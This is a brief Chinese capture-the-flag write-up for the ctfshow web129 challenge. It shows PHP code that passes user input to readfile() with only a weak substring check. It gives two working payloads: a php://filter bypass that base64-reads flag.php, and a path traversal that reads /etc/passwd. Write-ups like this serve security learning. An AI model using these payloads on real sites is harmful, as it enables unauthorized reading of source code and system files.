ctfshow web129(目录穿越)

if(isset($_GET['f'])){
    $f = $_GET['f'];
    if(stripos($f, 'ctfshow')>0){
        echo readfile($f);
    }
}

用php伪协议绕过,filter伪协议支持多种编码方式，无效的就被忽略掉了。

payload:?f=php://filter/read=convert.base64-encode|ctfshow/resource=flag.php

 

 

也可以利用目录穿越。

?f=./ctfshow/../../../../../../etc/passwd